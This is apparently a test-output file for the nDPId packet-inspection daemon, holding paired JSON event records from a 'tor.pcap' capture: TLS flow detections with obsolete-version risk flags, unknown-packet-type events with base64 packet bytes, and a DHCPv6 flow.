01159{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} 01159{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822192034,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822192034,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822192212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822192212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822193390,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822193390,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822194212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822194212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2136,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822196160,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2136,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822196160,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2136,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822196212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2136,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822196212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2193,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822198129,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2193,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822198129,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2193,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822198212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2193,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822198212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2231,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822200128,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2231,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822200128,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2231,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822200212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2231,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822200212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2318,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822202193,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2318,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822202193,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2318,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822202212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2318,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822202212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2421,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822204195,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2421,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822204195,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2421,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822204212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2421,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822204212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2544,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822206019,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2544,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822206019,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2544,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822206212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2544,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822206212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2564,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822207793,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2564,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822207793,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2564,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822208213} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2564,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822208213}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2577,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822209488,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2577,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822209488,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2577,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822210212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2577,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822210212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2632,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822212140,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2632,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822212140,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2632,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822212212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2632,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822212212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822214082,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822214082,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822214212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822214212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822216211,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822216211,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822216212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822216212}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1383822217531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822217531,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDIMBZjPcAAgAAgAAAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1383822217531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822217531,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDIMBZjPcAAgAAgAAAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822218202,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822218202,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822218212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822218212}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2800,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1383822218758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822218758,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDB8BZjPcAAgAAgBkAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2800,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1383822218758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822218758,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDB8BZjPcAAgAAgBkAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2854,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822220042,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2854,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822220042,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2854,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822220212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2854,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822220212}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2863,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1383822220774,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822220774,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhC1cBZjPcAAgAAgEsAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="} 